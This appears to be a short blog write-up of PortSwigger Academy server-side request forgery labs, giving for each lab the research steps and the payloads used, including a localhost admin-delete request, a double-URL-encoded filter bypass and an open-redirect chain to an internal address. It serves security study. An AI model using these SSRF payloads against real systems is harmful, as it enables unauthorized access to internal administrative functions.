PortSwigger Academy - Server Side Request Forgery
- Avraham Cohen
- Jul 26, 2021
- 1 min read
Studying for my eLearnSecurity eWPTX exam I decided to solve the Server Side Request Forgery labs from PortSwigger Academy. I must say that these labs are not easy and you can gain a lot of knowledge. Don't jump to the solution, try for yourself, if you are not able to get it in few hours then reverse engineer the payload.
Here is a list of the labs from Apprentice to Practitioner level:
You can find the lab list at the following link
Research: Intercept the request for the stock page and observe a call to stockAPI
change it to http://localhost/admin/delete?user=carlos and view the response states missing parameter username.
Research: Intercept the request for the stock page and observe a call to stockAPI. Send the request to the intruder and search for the response that states missing parameter username.
Payload: stockApi=http://192.168.0.7:8080/admin/delete?username=carlos
Research: Following the previous lab we can see that a call to localhost is being blocked.
I had to look at the results to understand what type of obfuscation they used (Double URL encoding).
Payload: http://127.1/%2561dmin/delete?username=carlos
Research: Intercept the request for the stock page and observe a call to stockAPI. Send the request to the intruder and check if it is possible to change the redirect. Keep on research for different requests you can see the Next Product request which contains the path parameter: /product/nextProduct?currentProductId=4&path=/product?productId=5 take this value and change the path to /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
Payload: stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
I don't have BurpSuite license so I can't get access to Burp Collaborator's.
Comments